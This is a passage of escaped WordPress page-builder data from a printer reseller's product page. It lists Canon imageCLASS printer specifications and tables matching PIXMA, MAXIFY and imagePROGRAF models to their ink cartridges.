MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n\\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 43ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li>\\n \\t<li>FPOT: 6.2secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 2,300 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f0eb648\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p>\\n\\n<\\/div>\\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 38ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 750 - 4,000 pages<\\/li>\\n \\t<li>FPOT: 5.5secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 900 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a7e17a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>imagePROGRAF PRO-500<\\/p><\\/td><td width=\\\"208\\\"><p>Maintenance Cartridge MC-20<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY iB4170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5070<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5370<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5470<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E3170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E410<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E4270<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E470<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E477<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E480<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E510<\\/p><\\/td><td width=\\\"208\\\"><p>CL-98 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-88 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560 \\/ E560R<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G2010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G4010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110 (with battery)<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP1300<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2770 \\/ iP2772<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2870S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP4200<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP7270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP8770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6870<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td 